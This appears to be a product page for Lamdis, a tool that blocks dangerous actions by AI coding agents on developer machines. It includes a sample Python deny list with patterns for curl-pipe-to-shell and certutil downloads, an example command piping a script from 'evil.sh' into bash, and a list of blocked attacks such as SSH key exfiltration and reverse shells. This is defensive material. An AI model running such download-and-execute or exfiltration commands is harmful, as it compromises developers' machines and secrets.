Lamdis is a local runtime security layer for AI coding agents. It intercepts process execution, file writes, and outbound network activity on the developer machine, evaluates them against policy, and stops dangerous actions before they run.
The Gap
AI coding agents — Cursor, Claude Code, Copilot, Windsurf — execute commands, write files, spawn processes, and open network connections directly on the developer's machine.
Existing security tools detect after the fact. EDR catches malware signatures, not an agent that opens security groups to 0.0.0.0/0 through a legitimate Terraform apply. SIEM sees the log hours later. Manual approval prompts don't tell the developer what they're actually approving.
There is currently no enforcement layer between AI agents and the operating system on developer machines. Lamdis is that layer.
What It Does
Lamdis runs on the developer machine and captures agent-initiated process execution, file operations, and outbound network activity before they complete.
Each action is evaluated against policy in real time. Not just pattern matching — Lamdis understands the difference between npm install and curl-pipe-bash, between a normal commit and a config change that opens a backdoor.
Safe actions proceed instantly. Dangerous actions are blocked before they execute — the process never starts, the file never writes, the connection never opens. The agent gets a denial. The developer gets an explanation.
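To make the allow/deny decision concrete, here is a minimal sketch of what a policy check over an intercepted command could look like. Everything here — the rule table, the `evaluate` function, the `Verdict` shape — is illustrative, not Lamdis's actual API, and real evaluation is contextual rather than pure pattern matching; this only conveys the shape of the decision.

```python
import re
from dataclasses import dataclass

@dataclass
class Verdict:
    allowed: bool
    reason: str  # the explanation surfaced to the developer

# Illustrative deny rules: a pattern plus the explanation shown on a block.
DENY_RULES = [
    (re.compile(r"curl[^|]*\|\s*(ba)?sh"),
     "download-and-execute: remote script piped to a shell"),
    (re.compile(r"0\.0\.0\.0/0"),
     "infrastructure change opens ingress to the entire internet"),
    (re.compile(r"certutil\s+-urlcache"),
     "certutil used as a downloader"),
]

def evaluate(command: str) -> Verdict:
    """Check an intercepted command against policy before it runs."""
    for pattern, reason in DENY_RULES:
        if pattern.search(command):
            return Verdict(allowed=False, reason=reason)
    return Verdict(allowed=True, reason="no policy match")
```

With rules like these, `evaluate("curl https://evil.sh | bash")` denies before the process starts, while `evaluate("npm install express")` proceeds instantly.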
What It Catches
The obvious stuff — remote code execution, credential dumping — gets blocked. But so does the harder stuff that EDR and static rules will never see.
Blocked
- PowerShell download-and-execute from remote server (process)
- SSH private key read + outbound POST (exfil)
- Terraform apply opening 0.0.0.0/0 ingress (infra)
- Git push of workflow that curls unknown script (ci/cd)
- certutil download to temp + immediate execution (process)
- Spawning reverse shell via encoded command (process)

Allowed
- npm install express (package)
- git commit -m "fix: update auth handler" (git)
- python manage.py migrate (process)
- HTTPS request to api.github.com (network)
- Write to src/components/Button.tsx (file)
- docker build -t app:latest . (process)

When Risky Is Necessary
Sometimes a risky action is the right action. Lamdis doesn't just block — it gives developers a clear explanation and safe ways to proceed.
- Approve this specific action. It executes once, the approval is logged, and next time it blocks again.
- Grant an exception for a deploy window or a sprint. When it expires, protections re-engage.
- See exactly what the agent is trying to do and why it was flagged. The developer confirms with context, not a blind click.
- Route to a teammate for approval. Two sets of eyes on the risky action, with a full audit trail.
Every block, every override, every approval — recorded with who, what, when, and why. Consistent policy enforcement with a real audit trail. Not ad hoc approvals that nobody can reconstruct later.
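One way such an audit record might be structured — the field names and values here are hypothetical, chosen only to show the who/what/when/why shape described above:

```python
import json
from dataclasses import dataclass, asdict

@dataclass
class AuditEvent:
    """Who, what, when, and why for a block, override, or approval."""
    actor: str        # developer or agent that triggered the action
    action: str       # the intercepted command or operation
    decision: str     # e.g. "blocked", "approved_once", "exception"
    reason: str       # the policy explanation shown to the developer
    approved_by: str  # teammate who signed off, if routed
    timestamp: str    # ISO 8601, UTC

# Hypothetical record for a one-time approval of a risky Terraform apply.
event = AuditEvent(
    actor="coding-agent",
    action="terraform apply (opens 0.0.0.0/0 ingress)",
    decision="approved_once",
    reason="infrastructure change opens ingress to the entire internet",
    approved_by="alice@example.com",
    timestamp="2025-01-15T14:03:22Z",
)
print(json.dumps(asdict(event), indent=2))
```

Because every event carries the same fields, the trail can be queried later to reconstruct exactly who approved what, and why.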
Where This Goes
Early Access
Lamdis is in private preview with teams that use AI coding agents in production workflows.